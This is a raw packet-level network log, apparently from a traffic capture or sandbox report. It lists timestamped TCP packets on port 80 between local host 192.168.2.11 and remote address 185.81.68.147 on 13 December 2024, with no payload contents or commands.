                                                                                                                                                                                                Dec 13, 2024 08:18:58.301742077 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.301781893 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.302232027 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.302248001 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.302263975 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.302288055 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.302401066 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.302417040 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.302433014 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.302448034 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.302448034 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.302474022 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.302654982 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.302700996 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.302728891 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.302745104 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.302788019 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.303297043 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.303322077 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.303340912 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.303366899 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.303416967 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.303432941 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.303447962 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.303462982 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.303462982 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.303488016 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.303942919 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.303957939 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.303975105 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.304003000 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.304043055 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.304303885 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.304320097 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.304335117 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.304361105 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.304380894 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.304395914 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.304410934 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.304419994 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.304450035 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.304630995 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.304646969 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.304662943 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.304680109 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.304697990 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.304721117 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.305522919 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.305538893 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.305555105 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.305569887 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.305573940 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.305617094 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.318422079 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.318439007 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.318454027 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.318470001 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.318487883 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.318500996 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.318501949 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.318519115 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.318536043 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.318551064 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.318713903 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.318730116 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.318746090 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.318754911 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.318783045 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.319062948 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.319080114 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.319096088 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.319111109 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.319122076 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.319147110 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.503149033 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.503201008 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.503217936 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.503238916 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.503293037 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.503326893 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.503364086 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.503396034 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.503412962 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.503431082 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.503438950 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.503473043 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.503573895 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.503633976 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.503694057 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.503710032 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.503726006 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.503731966 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.503743887 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.503757954 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.503791094 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.504203081 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.504290104 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.504307032 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.504331112 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.504417896 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.504435062 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.504451990 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.504463911 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.504491091 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.504513025 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.504859924 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.504889011 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.504904985 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.504929066 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.504955053 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.505039930 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.505063057 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.505079031 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.505093098 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.505104065 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.505131006 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.505445004 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.505506039 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.505522966 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.505562067 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.505676031 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.505692005 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.505708933 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.505724907 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.505734921 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.505745888 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.505935907 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.505953074 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.505969048 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.505978107 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.506005049 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.506433010 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.506485939 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.506500959 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.506545067 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.506582022 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.506609917 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.506624937 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.506640911 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.506654024 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.506663084 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.506827116 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.506854057 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.506870031 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.506870031 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.507375002 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.507401943 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.507417917 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.507421970 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.507445097 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.507586002 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.507602930 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.507617950 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.507632971 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.507644892 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.507671118 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.507853985 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.507893085 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.507908106 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.507934093 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.507947922 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.508317947 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.508375883 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.508390903 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.508433104 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.508539915 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.508555889 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.508570910 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.508586884 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.508595943 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.508614063 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.508750916 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.508775949 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.508791924 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.508817911 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.508845091 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.509308100 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.509383917 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.509401083 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.509428024 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.509490967 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.509506941 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.509521961 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.509537935 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.509550095 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.509573936 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.509733915 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.509759903 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.509774923 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.509776115 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.510224104 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.510272026 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.510313988 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.511852026 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.512021065 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.631714106 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.776606083 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.896435022 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.896675110 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.897109032 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:59.016782999 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.225151062 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.225176096 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.225188971 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.225316048 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.225322008 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.225331068 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.225413084 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.225433111 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.225445032 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.225456953 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.225601912 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.225601912 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.225629091 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.225641012 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.225743055 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.345211983 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.345280886 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.348767996 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.349442959 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.402533054 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.417217016 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.417288065 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.417424917 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.421422005 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.421480894 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.422202110 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.429840088 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.432867050 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.432972908 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.433478117 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.441306114 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.441381931 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.441423893 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.450232983 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.450247049 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.450517893 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.458060026 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.458157063 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.458380938 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.466525078 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.466614962 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.466635942 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.474958897 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.475017071 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.475070953 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.483259916 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.483365059 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.483403921 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.491710901 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.491832972 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.492257118 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.522353888 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.522444963 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.522494078 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.537134886 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.537818909 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.609730959 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.609857082 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.610265017 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.612343073 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.612441063 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.612562895 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.617423058 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.617459059 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.617568970 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.622526884 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.622539997 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.622668982 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.627140999 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.627154112 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.627788067 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.631870985 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.632013083 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.632091045 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.636439085 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.636560917 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.636687994 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.641124964 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.641180038 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.641324997 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.646306992 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.646321058 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.646465063 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.650518894 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.650687933 CET8049748185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:00.650795937 CET4974880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:00.655080080 CET8049748185.81.68.147192.168.2.11
